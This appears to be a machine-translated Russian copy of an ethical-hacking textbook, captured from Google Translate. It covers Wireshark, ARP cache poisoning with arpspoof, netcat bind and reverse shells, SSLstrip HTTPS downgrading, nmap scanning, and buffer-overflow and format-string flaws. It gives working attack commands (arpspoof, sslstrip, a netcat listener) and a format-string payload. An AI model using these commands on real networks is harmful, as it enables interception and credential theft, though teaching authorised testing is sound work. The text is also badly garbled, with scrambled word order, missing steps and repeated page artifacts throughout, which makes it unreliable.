ip - Интернет-протокол.
tcp - протокол управления передачей.
udp - Протокол дейтаграмм пользователя.
icmp - Протокол управляющих сообщений Интернета.
Наконец, вы можете комбинировать более одного условия с помощью операторов:
Стр.91
Сценарии :
Стр.92
В этом центре вы можете увидеть текстовое поле рядом с надписью « Снять … с помощью этого фильтра: »
где вы можете ввести свой фильтр BPF (как описано в предыдущем разделе
Tcpdump). Если вы не заинтересованы в фильтрации трафика и вместо этого хотите,
чтобы захватить все пакеты, просто оставьте это текстовое поле пустым. Под этим текстовым полем вы
можно увидеть список доступных интерфейсов, на которых Wireshark может захватывать трафик.
Первым (как показано на изображении выше) является «eth0», и это интерфейс.
нас интересует. Прежде чем вы сможете начать нюхать, вы должны выбрать
интерфейс; вы делаете это, просто щелкая нужный интерфейс и убедитесь, что он
выделен.
https://translate.googleusercontent.com/translate_f 69/242
09.10.2021, 18:33 Сетевой этический взлом и тестирование на проникновение
Стр.93
Каждый раз, когда вы решите остановить анализатор, нажмите кнопку что читает
« Прекратить захват пакетов ». Обратите внимание, как главное окно разделено на три
разделы:
Стр.94
https://translate.googleusercontent.com/translate_f 70/242
09.10.2021, 18:33 Сетевой этический взлом и тестирование на проникновение
Это именно переключателя
с помощью то, что сделал бы Tcpdump,
(-x). если бы выввключили
Самое прекрасное Wireshark эту опцию
то, что если
вы нажимаете на любое поле данных в Разделе 2, оно будет выделено в
эта секция. Итак, вы можете увидеть, где каждое поле на самом деле вписывается в
пакет.
Стр.95
Если вы увидите список под заголовком «Имя поля», вы заметите, что он охватывает множество
https://translate.googleusercontent.com/translate_f 71/242
09.10.2021, 18:33 Сетевой этический взлом и тестирование на проникновение
протоколы. Это протоколы, которые Wireshark поддерживает и может анализировать. Если
если вы развернете любой из этих протоколов, у вас появится подсписок полей для выбора
из. Каждое поле представляет собой фактическое поле в протоколе, и вы можете использовать это
поле для поиска в нем определенного значения. В большинстве ситуаций вы найдете
Самостоятельная фильтрация по общему протоколу (IP, TCP, UDP и т. д.). В
Ниже приведены некоторые из общих протоколов с некоторыми из их общих полей:
Стр.96
Ethernet - Ethernet:
eth.dst Место назначения (MAC).
http.host Хозяин.
FTP - протокол передачи файлов:
ftp.request Запрос.
ftp.response Ответ.
DNS - система доменных имен:
dns.a Адрес.
После того, как вы выберете поле, вам нужно будет выбрать отношение (чтобы связать
поле со значением) из списка «Связь», например, == ( равно ),! = ( не
равно ) и т. д. После этого вы добавляете значение - например, IP-адрес или порт
номер - в соответствующем поле. Наконец, вы нажимаете ОК, чтобы вставить поле
поисковый запрос. Если вы хотите объединить более одного поля, вы можете сделать это
используя любой из этих двух операторов: && ( и ) или || ( или ). Текстовое поле фильтра
должен стать зеленым, чтобы указать, что синтаксис запроса в порядке; если он станет красным, это
означает, что в вашем поисковом запросе есть синтаксическая ошибка. Когда вы будете готовы к работе,
нажмите кнопку со стрелкой, чтобы применить фильтр. Вот несколько примеров:
http.host == www.google.com
https://translate.googleusercontent.com/translate_f 72/242
09.10.2021, 18:33 Сетевой этический взлом и тестирование на проникновение
После применения фильтра отображения пакеты, которые не отображаются, все еще существуют.
Стр.97
в памяти. Итак, в любое время, когда вы хотите удалить фильтр и увидеть все пакеты
опять же, вы просто удаляете запрос фильтра из текстового поля и нажимаете кнопку "Применить"
снова стрелка.
Раскрашивание пакетов
Одна из крутых и полезных функций Wireshark - это его раскраска, когда
отображение пакетов в главном окне. Использование цветов для различных пакетов
types упрощает работу с вашими спотовыми пакетами определенного типа. Например,
Пакеты HTTP обычно отображаются светло-зеленым цветом, пакеты ARP - светлым.
желтый, а пакеты ICMP - светло-фиолетовый. Вы можете редактировать эти цвета и
назначить разные цвета разным типам, щелкнув Вид ➔ Раскраска
Rules , и появится следующее окно:
Стр.98
https://translate.googleusercontent.com/translate_f 73/242
09.10.2021, 18:33 Сетевой этический взлом и тестирование на проникновение
Вам будет сложно перетасовать все эти смешанные пакеты, если вы
интересует определенная установленная сессия. Здесь на помощь приходит Wireshark
с его функцией под названием « Следование по TCP-потоку» . Просто выбрав один
пакет, Wireshark может показать вам все другие пакеты, принадлежащие этому TCP
поток (сеанс). И этот фильтр не фильтрует пакеты по IP-адресу.
или номер порта, он просматривает порядковый номер TCP, чтобы выбрать только
пакеты, принадлежащие одному и тому же последовательному потоку. Мало того, с этим
функция, Wireshark покажет содержимое уровня приложения (полезную нагрузку) в
последовательность без беспорядка протоколов более низкого уровня (TCP, IP и Ethernet).
Чтобы проверить конкретный поток TCP, щелкните правой кнопкой мыши один пакет
интересующий вас поток, затем перейдите к " Подписаться " и в раскрывающемся меню
в меню выберите « TCP Stream ». Ниже приведен снимок экрана HTTP.
поток, показывающий заголовки HTTP в запросах и ответах:
Инспекция пакетов
Еще одна хорошая особенность Wireshark заключается в том, что он дает вам возможность установить
отображать фильтр на основе определенного значения поля, которое вас интересует. Скажем,
что пока вы проверяете пакет, какое-то странное содержимое определенного
поле привлекает ваше внимание, и вы хотите проверить, что все пакеты имеют это
странное содержание. В этом случае вы можете настроить фильтр отображения прямо из
Стр. 99
https://translate.googleusercontent.com/translate_f 74/242
09.10.2021, 18:33 Сетевой этический взлом и тестирование на проникновение
нужно поставить сетевые карты в неразборчивом режиме, чтобы он захватил все
пакеты. Однако когда мы говорим «все пакеты», это не означает, что все пакеты в
сеть, но все пакеты, поступающие на сетевую карту. И точно знать
какие пакеты на самом деле поступают на наши сетевые карты, требует, чтобы мы знали, как
наша сеть фактически подключена физически. Как правило, наша система может быть
часть либо узловой сети (старой и устаревшей), либо коммутируемой. А
Hubbed-сеть использует концентратор - устройство уровня 1 - для подключения нескольких
системы вместе, в то время как коммутируемая сеть использует коммутатор, который является уровнем 2
устройство - для подключения систем к сети.
Концентратор против коммутатора
Концентратор - это устройство, работающее на физическом уровне с несколькими физическими портами.
где несколько систем могут быть соединены вместе, как показано на схеме
ниже. Поскольку это устройство уровня 1, оно не может оценивать входящие в него пакеты;
и, как таковой, концентратор не знает, в какое место назначения отправляется пакет.
Таким образом, концентратор пересылает каждый приходящий пакет на все остальные порты. И из-за
что каждый пакет, плавающий в этой сети, в конечном итоге достигает сети
карта каждой системы. Таким образом, если система находится в беспорядочном режиме, она может
захватить все пакеты для всех остальных систем.
Стр. 100
Как вы можете видеть на диаграмме выше, система A отправляет пакет, предназначенный для
в Интернет. Когда этот пакет прибывает в хаб, хаб не знает
что пакет должен достичь маршрутизатора (шлюза); Итак, он пересылает пакет
ко всем подключенным к нему системам. Таким образом, пакет достигает систем B, C, D;
и маршрутизатор шлюза. Затем каждая система должна решить,
действительно имеет отношение к этому пакет или нет. В нашем случае, например, все системы
должен игнорировать пакет, кроме маршрутизатора, который должен пересылать
пакет во внешний мир, в Интернет. Однако, если система C, для
Например, был в беспорядочном режиме, он собирается захватить пакет. Так,
сниффинг в хаб-сети действительно дает возможность захватывать все пакеты
плавает в этой сети.
С другой стороны, в коммутируемой сети каждый компьютер получает трафик, который
предназначен только для него, помимо широковещательного и многоадресного трафика. Таким образом,
компьютер, подключенный к коммутатору, не может захватывать или анализировать трафик, связанный с другими
компьютеры. Это потому, что коммутатор - это устройство уровня 2, работающее на Data-
Связующий слой. Это означает, что он может читать MAC-адреса в каждом пакете и
принять разумное решение о том, на какой порт следует отправить пакет.
Коммутатор может принять такое решение благодаря тому, что у него есть таблица в
память, которая сопоставляет каждый физический порт с определенным MAC-адресом. Момент
новая система подключается к коммутатору, коммутатор записывает исходный MAC
адрес в первом пакете, отправленном этой системой; и этот MAC-адрес получает
связанный с физическим портом. С этого момента любой пакет, предназначенный для этого
MAC-адрес будет перенаправлен только на соответствующий физический порт.
https://translate.googleusercontent.com/translate_f 75/242
09.10.2021, 18:33 Сетевой этический взлом и тестирование на проникновение
Стр.101
Стр.102
https://translate.googleusercontent.com/translate_f 76/242
09.10.2021, 18:33 Сетевой этический взлом и тестирование на проникновение
Предположим, что система A хочет проверить связь с маршрутизатором шлюза. Система А знает
IP-адрес - но не MAC-адрес - этого маршрутизатора. Итак, перед отправкой
пакет ICMP Echo Request, система хочет запросить MAC-адрес
пункта назначения. ARP здесь пригодится; система отправляет типичный ARP
Запрос, который транслируется в сети. Используемый MAC-адрес назначения
в этом ARP-запросе - широковещательный (FF: FF: FF: FF: FF: FF), вызывающий
переключатель для пересылки этого пакета во все подключенные системы. Однако все системы
проигнорирует такой запрос, и только шлюз ответит ARP
Ответьте, указав свой MAC-адрес, как показано ниже:
Когда система A получает ответ ARP, она сохраняет ответ в так называемом
Кэш ARP. Он добавляет запись о том, что IP-адрес 192.168.0.1 имеет MAC
адрес 11: 22: 33: 44: 55: 66. Кэш ARP - это таблица, содержащая IP-адреса.
сопоставлениям MAC-адресов. У каждой записи по умолчанию время жизни 90.
секунды, по истечении которых срок действия записи истекает и она удаляется.
Одна из основных проблем безопасности протокола ARP - отсутствие в нем
аутентификация. Никакая система не может проверить подлинность
Стр.103
любой ответ ARP. Если ответ ARP содержит ложную информацию, получатель
не смог бы сказать. Не только это, но и ARP реализован в Операционной
Системы без отслеживания запросов и ответов. ОС не отслеживает
какой ответ соответствует какому запросу. И поэтому легко
злоумышленник отправляет поддельные ответы ARP и вводит ложные записи в кеш
любая система в локальной сети. Этот тип атаки называется ARP.
отравление, потому что вы отравляете кеш ARP целевой системы.
На диаграмме ниже вы, как тестер на проникновение, находитесь в системе C, и вы
хотите перехватить трафик между системой A и маршрутизатором. Поскольку ты
заинтересованы в просмотре интернет-трафика системы А, вы знаете, что все такие
трафик должен проходить через маршрутизатор. Любой пакет, покидающий систему A и
предназначенные для Интернета, необходимо перенаправить в вашу систему. Также любой
пакет, поступающий из Интернета через маршрутизатор и предназначенный для системы A
необходимо перенаправить в вашу систему. Таким образом, вам интересно увидеть оба
направления трафика, исходящий и входящий. И поскольку это будет
двунаправленного перехвата, вам нужно будет отравить кеш ARP
маршрутизатора, а также системы A.
https://translate.googleusercontent.com/translate_f 77/242
09.10.2021, 18:33 Сетевой этический взлом и тестирование на проникновение
Что вы будете делать, так это отправлять поддельные ARP-ответы; один к роутеру
а другой - системе A. В ответе ARP, отправленном маршрутизатору, будет указано, что
система A находится на вашем MAC-адресе, и ответ ARP отправлен системе A
будет утверждать, что маршрутизатор тоже находится на вашем MAC-адресе. Следующая таблица
показать детали для этих пакетов:
Тип пакета Исходный MAC MAC-адрес назначения Информация о входе
1 ARP CC: CC: CC: CC: CC: CC 11: 22: 33: 44: 55: 66 192.168.0.11 - это @
Отвечать CC: CC: CC: CC: CC: CC
2 ARP CC: CC: CC: CC: CC: CC AA: AA: AA: AA: AA: AA 192.168.0.1 - это @
Стр.104
Стр.105
Таким образом, теперь вы можете захватывать весь трафик, идущий туда и обратно между
система А и Интернет. В следующем разделе мы рассмотрим, как
практически выполнить эту атаку вместе с необходимыми инструментами.
Arpspoof
Это инструмент командной строки, разработанный Dug Song вместе с другими
инструменты взлома сети, которые вместе называются пакетом D-Sniff.
Arpspoof предназначен для выполнения одной конкретной задачи, а именно отравления
любой ARP-кеш любой системы в локальной сети. Как только вы укажете
цель и ложную информацию, Arpspoof отправляет поддельный ARP-ответ каждые
второй (по умолчанию). Arpspoof предустановлен в Kali Linux.
Однако перед запуском Arpspoof нам необходимо сделать предварительный шаг;
нам нужно включить в нашей системе возможность IP-переадресации (маршрутизации). Без
IP-переадресация, перехваченные пакеты не будут продолжать свой маршрут к
место назначения; они остановятся в нашей системе, вызывая отказ в обслуживании. Арпспуф,
как инструмент, не выполняет за нас маршрутизацию. Итак, мы должны включить его в системе
используя некоторую системную команду.
Чтобы включить переадресацию IP, мы можем ввести в окне терминала любой из
следующие команды:
# sysctl -w net.ipv4.ip_forward = 1
ИЛИ
Стр.106
После того, как вы введете любую из двух вышеперечисленных команд, ваша система будет вести себя как
роутер. На самом деле это означает, что как только ваша система получит
пакет, предназначенный для вашего MAC-адреса, но не для вашего IP-адреса, ваш
система изменит MAC-адрес источника пакета на свой собственный MAC
адрес и измените MAC-адрес назначения на тот, который связан с
IP-адрес назначения.
Теперь мы готовы запустить Arpspoof. Arpspoof может отравить одну цель
только или он может отравить две цели одновременно. Глядя на диаграмму
выше, поскольку мы хотим перехватить сетевой трафик между системой A и
маршрутизатор-шлюз, мы можем сделать это, используя любой из следующих двух методов:
Способ 1
Мы запускаем два экземпляра Arpspoof - каждый в отдельном окне терминала -
где каждый экземпляр отравляет одну из наших целей следующим образом:
На Терминале 1:
На Терминале 2:
Стр.107
следующий:
# arpspoof -i eth0 -t 192.168.0.1 -r 192.168.0.11
Обратите внимание, что не имеет значения, какой IP-адрес вы назначаете параметру -t или -
r переключатели. Здесь важно указать две системы, которыми вы являетесь.
интересует. Теперь Arpspoof будет отправлять два поддельных ARP-ответа каждую секунду.
Первый ответ будет отправлен на маршрутизатор шлюза, отравив его кеш с помощью false
информация о системе A, и второй ответ отправляется системе A
отравление своего кеша ложной информацией о шлюзе-маршрутизаторе.
Связывание и обратная оболочка с Netcat
Обзор
Одна из самых важных вещей при взломе и тестировании на проникновение - это
поддерживать удаленный доступ к жертве. Такой удаленный доступ позволит нам
управлять скомпрометированной системой удаленно с максимально возможной
https://translate.googleusercontent.com/translate_f 80/242
09.10.2021, 18:33 Сетевой этический взлом и тестирование на проникновение
привилегии.
лежащий в основеХотя существуют разные
протокол, все формыодин
они имеют удаленного доступа
общий аспект, на основе
и это
возможность выполнять команды оболочки в целевой системе. В Unix / Linux
system, оболочка предоставляется программой / bin / bash (или более старой
/ bin / sh), в то время как в системе Windows доступ к оболочке осуществляется с помощью программы
% WINDIR% \ System32 \ cmd.exe. Таким образом, любая удаленная оболочка в одном виде или
другой будет задействовать любую из этих программ. Мы будем использовать
/ bin / bash для доступа к оболочке через TCP-соединение с Unix / Linux,
и мы будем использовать% WINDIR% \ System32 \ cmd.exe, чтобы сделать то же самое для
Система Windows.
Стр.108
Подключение к любой службе TCP / UDP и отправка текста или двоичного файла
данные.
Прослушивание любого порта TCP / UDP и получение данных.
Выполнение определенной программы при определенных условиях.
Перенаправление портов, проксирование и туннелирование трафика.
Разрешение DNS, прямое и обратное.
Сканирование портов.
Захват пакетов.
https://translate.googleusercontent.com/translate_f 81/242
09.10.2021, 18:33 Сетевой этический взлом и тестирование на проникновение
Привязать
«Привязка» оболочку
- это термин в сетевом программировании, который означает назначение порта
номер к конкретному сокету. Привязка зарезервирует номер порта для
конкретная сетевая служба, которая будет прослушивать соединения по этому
порт. На примере Telnet мы можем сказать, что Telnet связывает порт 23 со своим
разъем. Связывание оболочки с netcat предоставит нам ту же модель, что и Telnet.
или SSH предоставляет; то есть клиент - это управляющая система, а сервер
Стр.109
https://translate.googleusercontent.com/translate_f 82/242
09.10.2021, 18:33 Сетевой этический взлом и тестирование на проникновение
система. Таким образом, система управления теперь является сервером, поскольку это
один прослушивает определенный номер порта - в то время как целевая система является клиентом.
Именно поэтому этот тип оболочки называют «обратной» оболочкой. В
направление установления соединения противоположно направлению команд:
Чтобы реализовать это с помощью Netcat, нам нужно установить слушателя на нашем управляющем
система. В этом примере мы будем использовать номер порта 12345:
netcat –v –l –p 12345
https://translate.googleusercontent.com/translate_f 83/242
09.10.2021, 18:33 Сетевой этический взлом и тестирование на проникновение
Чтобы понять ценность и важность SSLstrip, нам нужно понимать
как веб-браузеры ведут себя и реагируют на HTTP и HTTPS. В старом
дней, большое внимание уделялось тому, чтобы дать пользователю положительный отзыв
всякий раз, когда соединение было через правильный HTTPS. Однако если HTTPS
был сломан из-за неправильного цифрового сертификата (например, сертификат с истекшим сроком действия,
несоответствие имени или самозаверяющий сертификат), ошибка, выданная пользователю, была
незначительные и нормальные пользователи попадут в ловушку принятия таких
неправильный HTTPS. Это резко изменилось за последние годы. Интернет
браузеры устранили множество своих фантастических положительных отзывов и вместо этого запустили
чтобы все больше и больше сосредотачиваться на предоставлении пользователю отрицательной обратной связи
существует неправильная связь по протоколу HTTPS. Теперь пользователю очень сложно
принять самоподписанный сертификат, например, так как ему придется пройти через
несколько экранов, перемещающихся по его пути, чтобы сделать вывод, что только ИТ
сделают профессионалы. Такое изменение в поведении веб-браузеров вызвало
старые методы захвата SSL / TLS - например, подделка поддельного самоподписанного
сертификат посередине - бесполезен.
Это привело к тому, что автор SSLstrip Мокси Марлинспайк изобрел новый роман.
способ перехвата связи SSL / TLS. На самом деле это не нападение на
HTTPS в той же степени, что и атака на HTTP; особенно он использует
HTTP 302 Redirect, который заставляет браузер переключаться с HTTP-запроса на
запрос HTTPS.
Стр.112
Стр.113
https://translate.googleusercontent.com/translate_f 85/242
09.10.2021, 18:33 Сетевой этический взлом и тестирование на проникновение
следует:
Стр.115
https://translate.googleusercontent.com/translate_f 86/242
09.10.2021, 18:33 Сетевой этический взлом и тестирование на проникновение
Стр.116
https://translate.googleusercontent.com/translate_f 87/242
09.10.2021, 18:33 Сетевой этический взлом и тестирование на проникновение
Запуск SSLstrip
Чтобы успешно запустить SSLstrip, нам нужно перехватить трафик между
цель (жертва) и шлюз (маршрутизатор). Это делается с помощью отравления ARP.
атака:
Стр.117
Включить переадресацию IP
# sysctl –w net.ipv4.ip_forward = 1
Очень важно, чтобы наша система Kali Linux работала как маршрутизатор, чтобы
перехват трафика - с использованием ARP-отравления - становится успешным.
Запустить ARPspoof
Как только наше ARP-отравление будет обработано, мы можем перейти к настройке NAT.
(Трансляция сетевых адресов) правило с переадресацией портов. Это правило NAT будет
ищите пакеты, предназначенные для порта 80 (http), и как только есть совпадение, это
затем пакет внутренне перенаправляется на SSLstrip. Другими словами, SSLstrip будет
внутренне прослушивать определенный порт (например, 8080), чтобы его присутствие
не быть известным внешнему миру. Наша система Linux (Kali) перенаправит любой
HTTP-пакет на SSLstrip для волшебной работы.
https://translate.googleusercontent.com/translate_f 88/242
09.10.2021, 18:33 Сетевой этический взлом и тестирование на проникновение
Запустить SSLstrip
# sslstrip –l 8080
https://translate.googleusercontent.com/translate_f 89/242
09.10.2021, 18:33 Сетевой этический взлом и тестирование на проникновение
Заключительные примечания
В настоящее время существует тенденция настраивать веб-сайты по протоколу HTTPS. Мы видим это все больше
в настоящее время, как веб-сайты переходят с HTTP на HTTPS с помощью
внедрение SSL / TLS путем установки доверенных цифровых сертификатов. Все
«Большие» сайты - например, google.com, hotmail.com, youtube.com, facebook.com,
linkedin.com, wikipedia.org, bing.com и многие другие - уже
реализован SSL / TLS. Единственная оставшаяся проблема - это то, что сеть
браузер по умолчанию сначала отправляет запрос через HTTP, если пользователь не вводит
явно префикс https: //. Можно ожидать, что когда-нибудь в будущем,
такое поведение по умолчанию изменится; и до этого времени SSLstrip всегда будет
Работа.
https://translate.googleusercontent.com/translate_f 90/242
09.10.2021, 18:33 Сетевой этический взлом и тестирование на проникновение
работает эффективно: это инструмент nmap . Он предустановлен в Kali Linux.
А его домашняя страница:
https://nmap.org
В следующих разделах вы узнаете, как использовать nmap для выполнения каждого из
четыре действия, упомянутые выше.
Обнаружение хоста
Нельзя недооценивать важность обнаружения хоста. Как проникновение
тестировщики, мы не хотим тратить время на попытки сканировать несуществующие
системы. Такие попытки потратят много времени и ресурсов.
Существуют разные методы обнаружения активных хостов в заданном диапазоне сети.
или подсеть. Ни один из этих методов не может обнаружить всех живых хостов с абсолютным
Есть три пары типов, которые полезны для обнаружения живых хостов. Эти
пары следующие:
https://translate.googleusercontent.com/translate_f 91/242
09.10.2021, 18:33 Сетевой этический взлом и тестирование на проникновение
Стр. 123
https://translate.googleusercontent.com/translate_f 92/242
09.10.2021, 18:33 Сетевой этический взлом и тестирование на проникновение
Например: -PS21,22,23,25,80,113,443,31339
Сканирование портов
Теперь, когда у тестера проникновения есть список активных хостов, нужно перейти к следующему шагу.
через каждый действующий IP-адрес хоста и сканировать все или некоторые порты TCP / UDP.
Сканирование портов - это процесс определения того, какой порт закрыт, а какой -
открытым. Открытый порт - это порт, на котором есть прослушивающая сетевая служба, в то время как
закрытый порт - это порт, который не используется хостом. Каждый открытый порт - это потенциальный
https://translate.googleusercontent.com/translate_f 94/242
09.10.2021, 18:33 Сетевой этический взлом и тестирование на проникновение
Когда был разработан этот метод сканирования, он использовался для обхода IDS и
другие системы мониторинга. И поэтому он получил название «стелс».
В то время приложения и системы не регистрировали неполные
рукопожатие. Однако современные системы регистрируют этот тип сканирования.
Этот метод сканирования очень быстр по двум причинам: во-первых, он не требует
в системном вызове « connect ()» для инициирования сеанса TCP; это скорее
запрограммировано - с помощью программирования сокета - прямо в сканирование
программное обеспечение, таким образом, минуя уровни операционной системы, которые могут замедлить
вниз по процессу. Во-вторых, поскольку рукопожатие не завершено,
сканер не беспокоит отправку пакета ACK, тем самым сокращая время
и вычислительная мощность, что, в свою очередь, ускорит сканирование
процесс.
Этот метод является наиболее распространенным и наиболее широко используемым сканированием TCP.
https://translate.googleusercontent.com/translate_f 95/242
09.10.2021, 18:33 Сетевой этический взлом и тестирование на проникновение
метод. Это метод сканирования по умолчанию в Nmap . Однако это может быть
явно включен с помощью переключателя -sS . Например:
#nmap –Pn -sS 1-1024 192.168.1.1
https://translate.googleusercontent.com/translate_f 96/242
09.10.2021, 18:33 Сетевой этический взлом и тестирование на проникновение
Сканирование UDP-портов
Учитывая, что протокол UDP не требует установления соединения, сканирование портов UDP очень
Стр. 129
https://translate.googleusercontent.com/translate_f 97/242
09.10.2021, 18:33 Сетевой этический взлом и тестирование на проникновение
Стр.130
Базовая ОС (Solaris)
Поколение ОС (10)
Тип устройства (общего назначения, маршрутизатор, коммутатор и т. Д.)
Отпечатки ОС можно включить с помощью переключателя -O
https://translate.googleusercontent.com/translate_f 98/242
09.10.2021, 18:33 Сетевой этический взлом и тестирование на проникновение
выходит за рамки этой книги. Однако, как тестер на проникновение, вам следует
иметь общее представление о концепции обратного инжиниринга.
Существуют различные методы и инструменты, которые помогают реконструировать. Те
методы и инструменты обычно подпадают под одну из следующих двух
категории:
а. Статический анализ
б. Динамический анализ
… STRING ………
Стр.136
Ниже приведен пример сегмента кода, который читает " имя пользователя ".
введено пользователем:
...
char имя пользователя [100];
получает (имя пользователя);
...
https://translate.googleusercontent.com/translate_f 102/242
09.10.2021, 18:33 Сетевой этический взлом и тестирование на проникновение
Вот несколько реальных примеров уязвимостей переполнения буфера:
CVE-2010-2730
Эта уязвимость описана в базе данных CVE как переполнение буфера в Microsoft.
Internet Information Services (IIS) 7.5, когда включен FastCGI, позволяет удаленным злоумышленникам
для выполнения произвольного кода с помощью созданных заголовков в запросе, также известного как "Буфер заголовка запроса"
Уязвимость переполнения ".
CVE-2012-0150
Эта уязвимость описана в базе данных CVE как Переполнение буфера в msvcrt.dll в
Microsoft Windows Vista с пакетом обновления 2 (SP2), Windows Server 2008 с пакетом обновления 2 (SP2), R2 и R2 с пакетом обновления 1 (SP1) и W
Gold и SP1 позволяют удаленным злоумышленникам выполнять произвольный код через созданный медиафайл,
также известная как «Уязвимость Msvcrt.dll, связанная с переполнением буфера».
CVE-2016-0015
Эта уязвимость описана в базе данных CVE как DirectShow в Microsoft Windows.
Vista SP2, Windows Server 2008 SP2 и R2 SP1, Windows 7 SP1, Windows 8, Windows
8.1, Windows Server 2012 Gold и R2, а также Windows 10 Gold и 1511 позволяют удаленно
злоумышленники могут выполнить произвольный код через созданный файл, также известный как DirectShow Heap Corruption.
Уязвимость удаленного выполнения кода ».
printf (буфер);
Если пользователь (например, хакер) вводит AAAA% 08x.% 08x.% 08x.% 08x ,
тогда два метода станут следующими:
printf («% s», «AAAA% 08x.% 08x.% 08x.% 08x»);
а также
printf («AAAA% 08x.% 08x.% 08x.% 08x»);
Первый метод напечатает строку AAAA% 08x.% 08x.% 08x.% 08x как
это, однако, второй напечатает первую часть AAAA plus
четыре шестнадцатеричных числа из соседней памяти. Таким образом, этот метод
приведет к утечке информации. Другими словами, хакер может
читать сегменты памяти.
https://translate.googleusercontent.com/translate_f 103/242
09.10.2021, 18:33 Сетевой этический взлом и тестирование на проникновение
CVE-2012-1851
Эта уязвимость описана в базе данных CVE как « Уязвимость форматной строки в
служба диспетчера очереди печати в Microsoft Windows XP SP2 и SP3, Windows Server
2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2 и R2 SP1 и
Windows 7 Gold и SP1 позволяют удаленным злоумышленникам выполнять произвольный код через
обработанный ответ, также известный как «Уязвимость строки формата службы диспетчера очереди печати».
Стр.139
https://translate.googleusercontent.com/translate_f 104/242
09.10.2021, 18:33 Сетевой этический взлом и тестирование на проникновение
CVE-2015-4852
CVE-2017-9363
Я. Небезопасные алгоритмы
Программное приложение может быть уязвимо, если оно использует алгоритмы, которые
оказались ошибочными или слабыми, т. е. алгоритмы, которые когда-то были сильными
но были отозваны. В следующей таблице перечислены некоторые из слабых
криптографические алгоритмы в отличие от сильных и безопасных:
https://translate.googleusercontent.com/translate_f 105/242
09.10.2021, 18:33 Сетевой этический взлом и тестирование на проникновение
Криптографический Слабый / небезопасный Сильный / Безопасный
Класс Алгоритмы Алгоритмы
Симметричный DES, 3DES AES
Шифрование
Асимметричный - RSA, DSA, ECC
Шифрование
Хеширование MD4, MD5 SHA256, SHA512
SIP (протокол инициации сеанса) используется для услуги передачи голоса по IP (VoIP).
Компании используют SIP-серверы, чтобы телефонные звонки в пределах одного
https://translate.googleusercontent.com/translate_f 106/242
09.10.2021, 18:33 Сетевой этический взлом и тестирование на проникновение
офис или между филиалами, передаются по сети TCP / IP (либо
LAN или VPN). При настройке нескольких SIP необходимо соблюдать осторожность.
серверы в нескольких филиалах. Если SIP-сервер подключен к Интернету
через неправильно настроенные правила брандмауэра злоумышленники могут бесплатно
звонки через этот SIP-сервер.
Уязвимости протокола TCP / IP
Отравление DNS
Исчерпание DHCP
https://translate.googleusercontent.com/translate_f 107/242
09.10.2021, 18:33 Сетевой этический взлом и тестирование на проникновение
Манипуляции с маршрутизацией
Протоколы маршрутизации, такие как RIP и OSPF, особенно старые версии, являются
также подвержен различным атакам. Например, более старые версии, в которых
не иметь какой-либо формы аутентификации и / или авторизации
уязвимы для атак спуфинга. Злоумышленник может отправлять поддельные пакеты,
нарушить таблицы маршрутизации в автономной системе (AS) и
объявляет свою машину законным маршрутизатором; таким образом, злоумышленник
получает весь трафик. Существует инструмент под названием « Межсетевая маршрутизация.
Protocol Attack Suite ( IRPAS ) », предназначенный для выполнения маршрутизации
протоколные атаки. Его домашняя страница:
http://www.phenoelit.org/irpas/index.html
Уязвимости аутентификации
Аутентификация - это процесс подтверждения личности определенного объекта.
(например, пользователь или процесс). Аутентификация выполняется с помощью одного или нескольких
следующий:
Что такое пользователь: например, отпечатки пальцев, распознавание лица или голоса.
Что знает пользователь: например, пароли.
Что есть у пользователя: например, карта доступа или одноразовый токен.
Примеры уязвимостей, связанных с паролями:
https://translate.googleusercontent.com/translate_f 108/242
09.10.2021, 18:33 Сетевой этический взлом и тестирование на проникновение
III. Пароли по умолчанию
Многие производители и поставщики устанавливают пароли по умолчанию для своих
техника и приложения. Если эти пароли не меняются,
эти системы уязвимы для подбора пароля. Это долг системы
администраторов и инженеров, чтобы убедиться, что они первым делом
при установке новой системы необходимо изменить учетные данные по умолчанию.
Уязвимости авторизации
Авторизация - это процесс предоставления привилегий и прав после объекта
был аутентифицирован.
Наиболее распространенный способ возникновения уязвимости авторизации
нарушая малейшие привилегии. Когда пользователь обращается к системе как обычно
пользователь (не как root / администратор), все процессы, запущенные этой учетной записью пользователя
будут иметь ограниченные привилегии. В случае, если определенный процесс требует выполнения задачи с
административные привилегии, он временно повысит свои привилегии, чтобы
выполнить такую задачу. Однако он должен отказаться от этих повышенных привилегий.
сразу после завершения операции. Если процесс не прервался
эти привилегии, процесс будет продолжать работать как root / admin и любой
другая уязвимость будет иметь большее влияние на систему. Другими словами,
более поздние уязвимости будут использоваться с правами администратора / root вместо
привилегии пользователя.
Уязвимости доступности
Уязвимость доступности может возникнуть одним из двух возможных способов:
https://translate.googleusercontent.com/translate_f 109/242
09.10.2021, 18:33 Сетевой этический взлом и тестирование на проникновение
ускорить процесс
всякий раз, выполнения
когда ЦП программ.
сталкивается В нормальном
с условием процессе
(например, выполнения
если оператор с истинным или ложным
путей), ЦП оценивает условие, а затем переходит к выполнению
правильный путь; если условие истинно, ЦП выполняет инструкции
соответствующий «истинному» результату. В противном случае ЦП выполнит
инструкции, соответствующие «ложному» пути. Однако под спекулятивным
Выполнение, ЦП выполняет оба пути заранее - до условия
оценка - и сохраняет результаты в своем кеше. И как только условие
оценивается, ЦП выбирает правильные результаты из своего кеша. Чтобы проиллюстрировать, если
есть условие, которое гласит: « Если A истинно, сделайте X; если A ложно, сделайте Y », - ЦП
теперь вычисляет как X, так и Y, сохраняет их в кеше, и как только условие
оценивается, подбирает правильный выбор.
Учитывая, что обе логические ветви были выполнены и сохранены в кеше,
запущенная программа, не имеющая права видеть ни одну из логических
ветки, теперь могут запустить так называемую атаку побочного канала и получить доступ к сохраненным
данные. Зная адрес кеша данных, он может проверить содержимое
этот кеш не путем прямого доступа к нему (поскольку у него нет разрешения), а скорее
тем, насколько «быстрый» процессор отвергает свою попытку. Удержание из ответа
скорость называется атакой по стороннему каналу.
Для получения дополнительной информации об уязвимостях Spectre и Meltdown вы можете
проверьте этот сайт:
https://meltdownattack.com
Отслеживание и рейтинг уязвимостей
Система Common Vulnerabilities and Exposures (CVE)
Система CVE - это база данных (справочная система словарного типа или список)
все общеизвестные уязвимости и угрозы информационной безопасности. это
поддерживается MITER Corporation и спонсируется National Cyber
Отдел безопасности (NCSD) Министерства внутренней безопасности.
Все общеизвестные уязвимости хранятся в системе CVE. Каждый
уязвимость имеет CVE ID, название, описание, историческую информацию,
решения, оценка, кредиты и другие предметы. Оценка каждого CVE
уязвимость рассчитывается с использованием общей системы оценки уязвимостей.
(CVSS).
Общая система оценки уязвимостей (CVSS)
